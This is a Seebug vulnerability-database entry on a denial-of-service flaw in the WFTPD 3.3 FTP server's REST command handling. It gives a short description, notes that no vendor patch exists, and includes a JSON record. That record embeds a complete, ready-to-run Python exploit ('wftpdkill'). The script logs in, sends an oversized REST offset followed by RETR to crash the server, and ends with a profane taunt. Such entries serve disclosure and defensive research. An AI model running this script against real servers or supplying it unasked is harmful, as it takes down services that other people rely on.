Description
BUGTRAQ ID: 38762
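WFTPD is an FTP server for the Windows platform.
The WFTPD server has a denial-of-service vulnerability in its handling of the REST command: a remote attacker can terminate the FTP service by using REST to specify an invalid starting position and then requesting a file.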
Texas Imperial Software WFTPD 3.3
Vendor patch:
Texas Imperial Software
-----------------------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.wftpd.com/default.html
{"href": "https://www.seebug.org/vuldb/ssvid-19288", "status": "poc,details", "bulletinFamily": "exploit", "modified": "2010-03-18T00:00:00", "title": "WFTPD REST\u547d\u4ee4\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19288", "cvelist": [], "description": "BUGTRAQ ID: 38762\r\n\r\nWFTPD\u662f\u4e00\u6b3eWindows\u5e73\u53f0\u4e0b\u7684FTP\u670d\u52a1\u8f6f\u4ef6\u3002\r\n\r\nWFTPD\u670d\u52a1\u5668\u5728\u5904\u7406REST\u547d\u4ee4\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7REST\u547d\u4ee4\u5728\u6307\u5b9a\u4e86\u65e0\u6548\u7684\u8d77\u59cb\u4f4d\u7f6e\u540e\u8bf7\u6c42\u6587\u4ef6\u5bfc\u81f4FTP\u670d\u52a1\u7ec8\u6b62\u3002\n\nTexas Imperial Software WFTPD 3.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nTexas Imperial Software\r\n-----------------------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.wftpd.com/default.html", "viewCount": 6, "published": "2010-03-18T00:00:00", "sourceData": "\n # WFTPD 3.3 unhandled exception\r\n#\r\n# (x)dmnt 2010\r\n# -*- coding: windows-1252 -*-\r\n\r\nimport socket\r\nimport sys, time\r\n\r\n\r\ndef help_info():\r\n print ("Usage: wftpdkill <host> <login> <password> <existingfle>\\n")\r\n\r\ndef dos_it(hostname, username, passwd, exfile):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((hostname, 21))\r\n except:\r\n print ("[-] Connection error!")\r\n sys.exit(1)\r\n r=sock.recv(2048)\r\n print "[+] Connected"\r\n sock.send("user %s\\r\\n" %username)\r\n r=sock.recv(1024)\r\n time.sleep(3)\r\n sock.send("pass %s\\r\\n" %passwd)\r\n r=sock.recv(1024)\r\n print "Send evil 
commands"\r\n time.sleep(3)\r\n sock.send("pasv\\r\\n")\r\n r=sock.recv(1024)\r\n time.sleep(3)\r\n sock.send("rest 999999999999999999999999999999999999999999999999999999999999999999\\r\\n")\r\n r=sock.recv(1024)\r\n time.sleep(3)\r\n sock.send("retr %s\\r\\n" %exfile)\r\n time.sleep(3)\r\n sock.send("Burn, muthfcka, burn!\\r\\n")\r\n sock.close()\r\n print "Server killed\\r\\n"\r\n\r\nprint ("\\nWFTPD 3.3 remote DoS exploit")\r\n\r\nif len(sys.argv) < 5:\r\n help_info()\r\n sys.exit(1)\r\n\r\nelse:\r\n hostname=sys.argv[1]\r\n username=sys.argv[2]\r\n passwd=sys.argv[3]\r\n exfile=sys.argv[4]\r\n dos_it(hostname,username,passwd,exfile)\r\n sys.exit(0)\n ", "id": "SSV:19288", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:13:52", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "canvas", "idList": ["WFTPD"]}]}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850, "epss": 1678851499}}